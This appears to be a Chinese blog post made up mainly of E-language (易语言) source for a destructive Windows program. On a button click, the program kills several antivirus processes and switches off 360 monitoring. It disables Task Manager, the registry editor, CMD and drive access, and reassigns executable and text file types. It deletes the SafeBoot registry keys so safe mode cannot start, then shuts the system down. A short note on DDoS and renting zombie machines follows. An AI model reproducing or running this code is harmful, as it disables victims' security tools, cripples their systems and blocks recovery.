.版本 2.支持库 shell.程序集 窗口程序集1.子程序 _按钮1_被单击' 绕过杀毒软件防御:运行 (“taskkill /f /im kavsvc.exe”, 假, 1)运行 (“taskkill /f /im KVXP.kxp”, 假, 1)运行 (“taskkill /f /im Rav.exe”, 假, 1)运行 (“taskkill /f /im Ravmon.exe”, 假, 1)运行 (“taskkill /f /im Mcshield.exe”, 假, 1)运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)' 修改系统
时间:置现行时间 (到时间 (“8888年8月8日”))' 禁用任务管理器:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0)' 禁用注册表:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1)' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1)' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)' 隐藏开始中的关机:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)' 隐藏开始中的搜索:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)' OVER360防御:写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)' 结束360进程运行 (“taskkill /f /im 360tray.exe”, 假, 1)' 隐藏所有驱动器:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295)' 禁止所有驱动器:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295)' 隐藏文件夹选项:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1)' 将桌面对象隐藏:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1)' 隐藏开始中的关机:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)' 隐藏开始中的搜索:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)' 这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)' 隐藏主页选项组:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1)' 隐藏IE文件
菜单:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1)' 隐藏收藏夹菜单:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1)' 禁用IE打印功能:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1)' 隐藏Internet选项:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1)' 禁止IE查看源文件:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1)' 禁用IE下载功能:写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3)' 禁止右键关联菜单:写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1)' 修改文件关联:写注册项 (1, “.txt\”, “jpegfile”)写注册项 (1, “.inf\”, “jpegfile”)写注册项 (1, “.reg\”, “jpegfile”)写注册项 (1, “.exe\”, “jpegfile”)' 无法进入安全模式:删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)' 关机:关闭系统 (2, 真)1、分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将
多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击。
2、简单说这主要是因为TCP的连接三次握手,因此可以不断的更换IP连接服务器,或者自己拥有大量的僵尸机,这个之前遇到过有人是租用的。
评论列表(0条)